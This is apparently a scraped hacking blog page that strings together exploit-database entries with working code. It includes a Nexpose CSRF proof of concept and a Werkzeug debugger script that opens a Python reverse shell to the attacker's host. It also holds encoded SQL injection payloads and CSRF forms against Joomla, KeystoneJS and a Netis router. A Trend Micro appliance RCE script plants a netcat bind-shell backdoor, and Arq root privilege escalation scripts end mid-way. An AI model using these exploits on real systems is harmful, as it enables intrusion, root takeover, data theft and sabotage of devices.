# Exploit Title: [Cross Site Request Forgery at Nexpose Automated Actions]
# Release Date: [2017-12-13]
# Exploit Author: [Shwetabh Vishnoi]
# Link: https://www.linkedin.com/in/shwetabhvishnoi
# Vendor Homepage: [https://www.rapid7.com/]
# Software Link: [https://www.rapid7.com/products/nexpose/download/]
# Tested on: [Windows,Linux,Mac]
# CVE : [CVE-2017-5264]
# Solution: Update to 6.4.66
# Affected Version(s): Rapid7 Nexpose 6.4.65
Rapid7 Nexpose 6.4.13
Rapid7 Nexpose 6.4.12
Rapid7 Nexpose 5.8.6
Rapid7 Nexpose 5.8
Rapid7 Nexpose 5.7.5
Rapid7 Nexpose 5.5.4
Rapid7 Nexpose 5.5.3
Rapid7 Nexpose 5.4.8
Rapid7 Nexpose 5.4.7
Rapid7 Nexpose 5.4.6
Rapid7 Nexpose 5.5.8
Rapid7 Nexpose 5.5.7
Rapid7 Nexpose 5.5.6
Rapid7 Nexpose 5.5.5
Rapid7 Nexpose 5.5.1
Rapid7 Nexpose 5.4.9
Rapid7 Nexpose 5.4.5
Rapid7 Nexpose 5.4.4
Rapid7 Nexpose 5.4.3
Rapid7 Nexpose 5.4.2
Rapid7 Nexpose 5.4.12
Rapid7 Nexpose 5.4.11
Rapid7 Nexpose 5.4.10
Rapid7 Nexpose 5.4.1
Rapid7 Nexpose 5.4
Description: Versions of Nexpose prior to 6.4.66 fail to adequately
validate the source of HTTP requests intended for the Automated
Actions administrative web application, and are susceptible to a
cross-site
request forgery (CSRF) attack.
Affected URL/endpoint:
https://nexpose-server.com/eso/conductor-service/api/workflows
Proof Of Concept:
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"https:\/\/nexpose-server.com\/eso\/conductor-service\/api\/workflows\/",
true);
xhr.setRequestHeader("Accept", "application\/json,
text\/javascript, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/json");
xhr.withCredentials = true;
var body =
"{\"name\":\"test2\",\"steps\":[{\"serviceName\":\"nexpose\",\"stepConfiguration\":{\"typeName\":\"discover-known-assets\",\"previousTypeName\":\"\",\"configurationParams\":{\"valueClass\":\"Object\",\"objectType\":\"siteMetadata\",\"properties\":{\"siteID\":{\"valueClass\":\"Array\",\"items\":[{\"valueClass\":\"Integer\",\"value\":67}]},\"VULN_CATEGORY\":{\"valueClass\":\"Array\",\"items\":[{\"valueClass\":\"Object\",\"objectType\":\"VULN_CATEGORY_ITEM\",\"properties\":{\"operator\":{\"valueClass\":\"String\",\"value\":\"CONTAINS\"},\"operand1\":{\"valueClass\":\"String\",\"value\":\"dos\"}}}]}}}}},{\"serviceName\":\"nexpose\",\"stepConfiguration\":{\"typeName\":\"tag\",\"previousTypeName\":\"discover-known-assets\",\"configurationParams\":{\"valueClass\":\"Object\",\"objectType\":\"tag\",\"properties\":{\"tagID\":{\"value\":339,\"valueClass\":\"Integer\",\"text\":\"Test\"}}}}}]}";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863559430
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
import requests
import sys
import re
import urllib
# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422
if len(sys.argv) != 5:
print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0])
sys.exit(-1)
response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
if "Werkzeug " not in response.text:
print "[-] Debug is not enabled"
sys.exit(-1)
# since the application or debugger about python using python for reverse connect
cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''' % (sys.argv[3],sys.argv[4])
__debugger__ = 'yes'
frm = '0'
response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
secret = re.findall("[0-9a-zA-Z]{20}",response.text)
if len(secret) != 1:
print "[-] Impossible to get SECRET"
sys.exit(-1)
else:
secret = secret[0]
print "[+] SECRET is: "+str(secret)
# shell
print "[+] Sending reverse shell to %s:%s, please use netcat listening in %s:%s" % (sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
raw_input("PRESS ENTER TO EXPLOIT")
data = {
'__debugger__' : __debugger__,
'cmd' : str(cmd),
'frm' : frm,
's' : secret
}
response = requests.get("http://%s:%s/console" % (sys.argv[1],sys.argv[2]), params=data,headers=response.headers)
print "[+] response from server"
print "status code: " + str(response.status_code)
print "response: "+ str(response.text)
# # # # #
# Exploit Title: TSiteBuilder 1.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.datacomponents.net/
# Software Link: http://www.datacomponents.net/products/website/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php
#
# User: ' OR 1 -- - Pass: anything
#
# 2)
# http://localhost/[PATH]/site.php?id=[SQL]
#
# %2d%33%36%34%27%20%20%2f%2a%21%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%21%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%31%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%21%30%38%38%38%38%43%4f%4e%43%41%54%5f%57%53%2a%2f%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35%33%34%31%34%65%32%30%35%33%34%35%34%65%34%33%34%31%34%65%2c%28%2f%2a%21%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a%21%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74%28%2a%29%2f%2a%21%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%2f%2a%21%30%38%38%38%38%74%61%62%6c%65%5f%6e%61%6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a%21%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2a%2f%2c%30%78%61%33%61%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d
#
# 3)
# http://localhost/[PATH]/pagelist.php?id=[SQL]
#
# 4)
# http://localhost/[PATH]/page_new.php?id=[SQL]
#
# # # # #
# # # # #
# Exploit Title: Task Rabbit Clone 1.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://migrateshop.com/
# Software Link: http://migrateshop.com/product/task-rabbit-clone-php-script/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/pages/single_blog.php?id=[SQL]
#
# %31%20%20%2f%2a%21%31%33%33%33%37%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%33%33%33%37%53%45%4c%45%43%54%2a%2f%20%31%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d
#
# # # # #
<!--
# # # # #
# Exploit Title: Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/js-support-ticket/
# Software Download: http://joomsky.com/46/download/1.html
# Version: 1.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6007
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability implication allows an attacker to inject html code, edit ticket etc..
#
# Proof of Concept:
-->
<html>
<body>
<form action="http://localhost/[PATH]/index.php" method="POST" enctype="multipart/form-data" name="adminForm" id="adminForm">
<textarea name="message" id="message" cols="60" rows="20" style="width: 550px; height: 300px;">
<p>[CODE]</p>
</textarea><br>
<input type="submit" class="button" name="submit_app" id="submit_app_button" onclick="return validate_form(document.adminForm)" value="Ver Ayari">
<input type="hidden" name="id" id="id" value="1" />
<input type="hidden" name="isoverdue" id="isoverdue" value="0" />
<input type="hidden" name="ticketid" id="ticketid" value="vCP4VTWrwzY" />
<input type="hidden" name="c" id="c" value="ticket" />
<input type="hidden" name="task" id="task" value="saveticket" />
<input type="hidden" name="uid" id="uid" value="521" />
<input type="hidden" name="view" id="view" value="ticket" />
<input type="hidden" name="layout" id="layout" value="formticket" />
<input type="hidden" name="check" id="check" value="" />
<input type="hidden" name="option" id="option" value="com_jssupportticket" />
<input type="hidden" name="created" id="created" value="2018-01-27 11:46:58"/>
<input type="hidden" name="update" id="update" value=""/>
</form>
</body>
</html>
# # # # #
# Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: https://joomlatag.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/
# Version: 5.3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6008
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker download arbitrary file....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=[FILE]
#
# # # # #
# # # # #
# Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/categories?keyword=&mctid=[SQL]&subctid=[SQL]
#
# -Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
#
# # # # #
# # # # #
# Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://vastal.com/
# Software Link: http://vastal.com/buddy-zone-social-networking-script.html
# Version: 2.9.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/chat_im/chat_window.php?request_id=[SQL]
#
# -551++/*!13337UNION*/+/*!13337SELECT*/+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+-
#
# http://localhost/[PATH]/search_events.php?category=[SQL]
#
# # # # #
# Exploit Title: Application wide CSRF Bypass
# Date: Sep, 2017
# Exploit Author: Saurabh Banawar
# Vendor Homepage: http://keystonejs.com/
# Software Link: https://github.com/keystonejs/keystone
# Version: 4.0.0
# Tested on: Windows 8.1
# CVE : 2017-16570
Link: https://vuldb.com/?id.109170
Exploit:
<html>
<body>
<form action="http://127.0.0.1:3000/keystone/api/users/create" method="POST"
enctype="multipart/form-data">
<input type="hidden" name="name.first" value="Saurabh" />
<input type="hidden" name="name.last" value="Banawar" />
<input type="hidden" name="email"
value="saurabh.banawar@securelayer7.net" />
<input type="hidden" name="password" value="test" />
<input type="hidden" name="password_confirm" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#!/usr/local/bin/python
"""
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/
File: TDA_InstallationCD.2.6.1062r1.en_US.iso
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1
Summary:
========
The vulnerabity is that the dlp_policy_upload.cgi allows the upload of a zip file, located statically as: /var/dlp_policy.zip.
The problem is that we can then get that file extracted using admin_dlp.cgi. This gets extracted into 2 locations:
- /eng_ptn_stores/prod/sensorSDK/data/
- /eng_ptn_stores/prod/sensorSDK/backup_pol/
We can then use symlinks to craft a symlinked that points to /opt/TrendMicro/MinorityReport/bin/
ls -la /eng_ptn_stores/prod/sensorSDK/data/si
lrwxrwxrwx 1 root root 35 Sep 3 01:22 /eng_ptn_stores/prod/sensorSDK/data/si -> /opt/TrendMicro/MinorityReport/bin/
Then, all we do is create /eng_ptn_stores/prod/sensorSDK/data/si/dlp_kill.sh with malicious code and get it executed...
Notes:
======
- For this particular PoC, all I did was exec a bind shell using netcat showing that there is no firewall protections...
- Auth is bypassed in an alternate poc, so we can attack this with the default password...
Exploitation
============
This is a clever trick, basically, we cant traverse since unzip checks for ../ (even though spec says its ok).
We can still exploit this however by extracting a symlink to say a directory and then write into that directory.
For example, if you wanted to link to /tmp you would
ln -s /tmp/ pwn
zip --symlinks -r foo.zip pwn
Now foo.zip contains the symlink to /tmp. Once this is extracted, the symlink will be written to disk.
All we need todo now is create another zip file with the folder and file...
zip -r foo.zip pwn/hax.txt
Now after extracting foo.zip, we will write hax.txt into /tmp. Of course, we can automate this magic via python.
So, in summary, the steps to attack this target are:
1. Bypass the auth via XXXX
2. upload a zip with a symlink
3. trigger extraction, crafting the malicious symlink
4. upload another zip with the malicious dlp_kill.sh file
5. trigger extraction, the symlink fires and crushs /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
6. trigger the execution of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh via admin_dlp.cgi
Greetz to the busticati, you know who you are. My home boys.
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <pass>
(+) eg: ./poc.py 172.16.175.123 admin
saturn:~ mr_me$ ./poc.py 172.16.175.123 admin123
(+) logged into the target...
(+) performing initial preflight attack...!
(+) uploading the zipped symlink...
(+) successfuly uploaded the zipped symlink
(+) extracting the symlink...
(+) extracted the symlink!
(+) uploading the zipped dlp_kill.sh...
(+) successfuly uploaded the zipped log_cache.sh
(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/...
(+) extracted the dlp_kill.sh file!
(+) starting backdoor...
(+) backdoor started !
(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !
(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
id
uid=0(root) gid=0(root)
uname -a
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
sleep 1;
sid=`pidof sensormain`
if [ "$sid" -eq "" ]; then
break
else
if [ $i -eq 4 ]; then
kill -9 $sid
fi
fi
done
`nc -e /bin/sh -lp 2122>/dev/null`
sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
sleep 1;
sid=`pidof sensormain`
if [ "$sid" -eq "" ]; then
break
else
if [ $i -eq 4 ]; then
kill -9 $sid
fi
fi
done
exit
Cleanup:
========
We just use "sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh" to remove the last line
of the script (the backdoor).
"""
import os
import sys
import time
import zipfile
import requests
import threading
from cStringIO import StringIO
requests.packages.urllib3.disable_warnings()
def _get_bd():
bd = """#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
sleep 1;
sid=`pidof sensormain`
if [ "$sid" -eq "" ]; then
break
else
if [ $i -eq 4 ]; then
kill -9 $sid
fi
fi
done
`%s>/dev/null`
""" % c
return bd
def _build_zip(CREATE_SYMLINK=False):
"""
builds the zip file using a symlink attack into a folder...
so we symlink the /opt/TrendMicro/MinorityReport/bin/ directory
and then crush the dlp_kill.sh only to then later get it executed
resulting in rce as root.
"""
if CREATE_SYMLINK:
zipinfo = zipfile.ZipInfo()
zipinfo.filename = u'si'
zipinfo.external_attr |= 0120000 << 16L # symlink file type
zipinfo.compress_type = zipfile.ZIP_STORED
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
if CREATE_SYMLINK:
z.writestr(zipinfo, "/opt/TrendMicro/MinorityReport/bin/")
else:
zipinfo = zipfile.ZipInfo("si/dlp_kill.sh")
zipinfo.external_attr = 0777 << 16L # give full access to included filezipinfo
# backdooring code, as we do
z.writestr(zipinfo, _get_bd())
z.close()
test = open('hax.zip','wb')
test.write(f.getvalue())
test.close()
return f.getvalue()
def we_can_upload_a_zip(CREATE_SYMLINK=False):
"""
uploads a zip file with php code inside to our target for exploitation
"""
multiple_files = {
'Q_UPLOAD_ID': (None, ''),
'binary1': ('pwn.zip', _build_zip(CREATE_SYMLINK), 'application/zip'),
'submit': (None, 'Import')
}
r = s.post(upload_url, files=multiple_files, verify=False)
if r.status_code == 200:
return True
return False
def unzip():
try:
r = s.post(unzip_url, data={"act":"save","upload_status":"0"}, verify=False)
except:
pass
return True
def we_can_login():
r = s.post(login_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
return True
return False
def main():
global c, s, t, p, login_url, unzip_url, upload_url
if len(sys.argv) != 3:
print "(+) usage: %s <target> <pass>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 admin" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
p = sys.argv[2]
bu = "https://%s/" % t
login_url = "%scgi-bin/logon.cgi" % bu
unzip_url = "%scgi-bin/admin_dlp.cgi" % bu
upload_url = "%scgi-bin/dlp_policy_upload.cgi" % bu
s = requests.Session()
# 1st we bypass auth and login
if we_can_login():
# we just use a bind, demonstrating that the target doesnt even have a proper firewall!
c = "nc -e /bin/sh -lp 2122"
print "(+) logged into the target..."
print "(+) performing initial preflight attack...!"
print "(+) uploading the zipped symlink..."
# 2nd we upload symlink attack
if we_can_upload_a_zip(CREATE_SYMLINK=True):
print "(+) successfuly uploaded the zipped symlink"
print "(+) extracting the symlink..."
# 3rd we extract it
unzip()
print "(+) extracted the symlink!"
time.sleep(2) # let the server process things
print "(+) uploading the zipped dlp_kill.sh..."
# 4th we upload the backdoor
if we_can_upload_a_zip(CREATE_SYMLINK=False):
print "(+) successfuly uploaded the zipped log_cache.sh"
print "(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/..."
# 5th extract the backdoor, crushing /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
unzip()
print "(+) extracted the dlp_kill.sh file!"
print "(+) starting backdoor..."
# 6th we trigger the exec of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
thread = threading.Thread(target=unzip, args=())
thread.daemon = True
thread.start()
print "(+) backdoor started !"
print "(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !"
print "(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh"
time.sleep(2)
os.system("nc %s 2122" % t)
if __name__ == '__main__':
main()
# Exploit Title: Netis-WF2419 Router Cross-Site Request Forgery (CSRF)
# Date: 28/01/2018
# Exploit Author: Sajibe Kanti
# Author Contact: https://twitter.com/@sajibekantibd
# Vendor Homepage: http://www.netis-systems.com/
# Version: Netis-WF2419, V2.2.36123
# Tested on: Windows 10
#Technical Details & Description:
A cross-site request forgery web vulnerability has been discovered in the
official Netis-WF2419 Router.
The vulnerability allows remote attackers to manipulate client-side
web-application to browser requests to compromise the router
by execution of system specific functions without session protection.
A remote attacker is able to delete Address Reservation List settings of
Netis Router with a cross-site request forgery html script code.
The vulnerability can be exploited by loading embedded html code in a site
or page. The issue can also be exploited by attackers to external redirect
an user account
to malicious web pages.
The issue requires medium user interaction in case of exploitation. The
request method to execute is GET and the attack vector is located on the
client-side of the router firmware.
Exploitation of the cross site request forgery web vulnerability requires
no privilege web application user account and medium or high user
interaction.
Successful exploitation results in client-side account theft by client-side
phishing, client-side external redirects and non-persistent manipulation of
application functions that are in use.
The vulnerability can be exploited by remote attackers without privileged
application user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
#Manual steps to reproduce the vulnerability :
1. Logging Your Netis Router
1. Now inject or use the html code
2. When the user of the router opens the html code in site or other type of
redirection. Router Address Reservation List will be erased!
4. Successful reproduce of the cross site request forgery vulnerability!
#PoC: Exploitcode :
<html>
<body>
<form action="http://192.168.10.2/cgi-bin-igd/netcore_set.cgi"
method="POST">
<input type="hidden" name="mode_name" value="netcore_set" />
<input type="hidden" name="reserve_address_set" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Note: By loading this html code All Address Reservation List will be erased
and the router becomes finally misconfigured!
# # # # #
# Exploit Title: Multilanguage Real Estate MLM Script <= 3.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script
# Version: <= 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/product-list.php?srch=[SQL]
#
# %73%66%64%27%29%20%20%2f%2a%21%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%21%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%28%31%29%2c%28%32%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%34%29%29%2d%2d%20%2d
#
# # # # #
#!/bin/bash
#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
#################################################################
app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"
vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`
if [ "$vuln" == "" ] ; then
echo "Not vulnerable - auto-updates not enabled."
exit 1
fi
if [ "$1" != "-f" ] ; then
latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
status_line="`egrep -i 'backup session.*?(ended|started)' \
\"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"
if [ "$status_line" != "" ] ; then
echo -n "WARNING: backup in progress, the user will very "
echo "likely notice if we exploit now!"
echo "use -f to override."
exit 1
fi
fi
owd="`pwd`"
if [ -e ~/.arq_510_privesc_exp ] ; then
rm -rf ~/.arq_510_privesc_exp
fi
mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp
echo "copying application..."
cp -R /Applications/Arq.app .
echo "compiling payloads..."
cat > payload.sh <<EOF
#!/bin/bash
rm -rf $HOME/.arq_510_privesc_exp
while :
do
pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
|cut -d ' ' -f2\`
if [ "\$pid" != "" ] ; then
kill -9 \$pid
open $app/Contents/Library/LoginItems/Arq\ Agent.app
exit 0
fi
done
EOF
chmod 755 payload.sh
au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`
cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>
int main(int ac, char *av[])
{
if (ac > 1 && strcmp(av[1], "boom") == 0) {
setuid(0);
setgid(0);
execl(
"/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
"estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
"load.sh;/bin/bash", NULL
);
}
return 0;
}
EOF
mv Arq.app/Contents/Resources/standardrestorer \
Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
rm -f shell.c
payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`
GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
cwd=`pwd`
echo "creating backdoored Arq.zip..."
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/
echo "executing upgrade..."
"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
1>/dev/null 2>/dev/null
echo "waiting..."
while :
do
ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`
if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
cd "$owd"
$res/standardrestorer boom
exit 0
fi
sleep 0.2
done
#!/usr/bin/env ruby
#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
#################################################################
###### ######
###### Usage: ######
###### ######
###### ./arq_5.10.rb # stage 1 ######
###### ######
###### (wait for next Arq backup run) ######
###### ######
###### ./arq_5.10.rb # stage 2 ######
###### ######
###### if you know the HMAC from a previous run: ######
###### ######
###### ./arq_5.10.rb stage2 <hmac> ######
###### ######
#################################################################
###### USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT ######
###### USER'S CRONTAB! ######
#################################################################
$binary_target = "/tmp/arq_510_exp"
class Arq510PrivEsc
def initialize(args)
@payload_file = ".arq_510_exp_payload"
@hmac_file = ENV["HOME"] + "/.arq_510_exp_hmac"
@backup_file = ENV["HOME"] + "/" + @payload_file
@target = shell("ls -1t ~/Library/Arq/Cache.noindex/ |head -n1")
@bucket_uuid = shell("grep 'writing head blob key' " +
"~/Library/Logs/arqcommitter/* |tail -n1 |sed 's/^.*key //' |cut -d " +
"' ' -f4")
@computer_uuid = shell("cat ~/Library/Arq/config/app_config.plist |grep " +
"-A1 #{@target} |tail -n1 |xargs |cut -d '>' -f2 |cut -d '<' -f1")
@backup_endpoint = shell("cat ~/Library/Arq/config/targets/#{@target}.target " +
"|grep -A1 '>endpointDescription<' |tail -n1 |xargs |cut -d '>' -f2 " +
"| cut -d '<' -f1")
@latest_backup_set = latest_backup_set
puts " target: #{@target}"
puts " bucket uuid: #{@bucket_uuid}"
puts " computer uuid: #{@computer_uuid}"
puts "backup endpoint: #{@backup_endpoint}"
puts " latest backup: #{@latest_backup_set}\n\n"
if args.length >0
method = args.shift
if respond_to? method
send method, *args
end
else
if File.exist? @hmac_file
method = :stage2
else
method = :stage1
end
send method
end
end
def shell(command)
`#{command}`.chomp
end
def latest_backup_set
shell("grep 'writing head blob' ~/Library/Logs/arqcommitter/* |tail -n1 " +
"|sed 's/.*key //' |cut -d ' ' -f1")
end
def scan_hmac_list
packsets_path = shell("find ~/Library/Arq/ -type d -name packsets")
hmac = {}
shell("strings #{packsets_path}/*-trees.db").split("\n").each do |line|
if (m = line.match(/[0-9a-fA-F]+/)) and m[0].length == 40
if !hmac.include? m[0]
hmac[m[0]] = 1
end
end
end
hmac
end
def stage1
print "building HMAC cache... "
hmac = scan_hmac_list
File.open(@hmac_file, "w") do |f|
f.write(@latest_backup_set + "\n" + hmac.keys.join("\n"))
end
puts "done - stored at #{@hmac_file}"
print "dropping backup file... "
File.open(@backup_file, "w") do |f|
